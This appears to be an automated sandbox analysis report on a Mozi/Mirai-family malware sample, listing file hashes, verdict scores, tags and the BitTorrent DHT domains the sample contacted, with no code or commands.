
mozi.a.zip

Status: finished
Submission Time: 2021-02-06 11:34:42 +01:00
Tags: Malicious, Spreader, Trojan, Evader, Mirai

Details

  • Analysis ID:
    349551
  • API (Web) ID:
    601065
  • Analysis Started:
    2021-02-06 11:34:42 +01:00
  • Analysis Finished:
    2021-02-06 11:45:16 +01:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Verdict scores:
  • malicious, 100/100
  • malicious, 40/61
  • malicious, 20/37
  • malicious, 19/28
  • malicious

IPs

Domains

Name                     IP
dht.transmissionbt.com   212.129.33.59
bttracker.acc.umu.se     130.239.18.159
router.bittorrent.com    67.215.246.10
router.utorrent.com      82.221.103.244
bttracker.debian.org     0.0.0.0

URLs

Dropped files
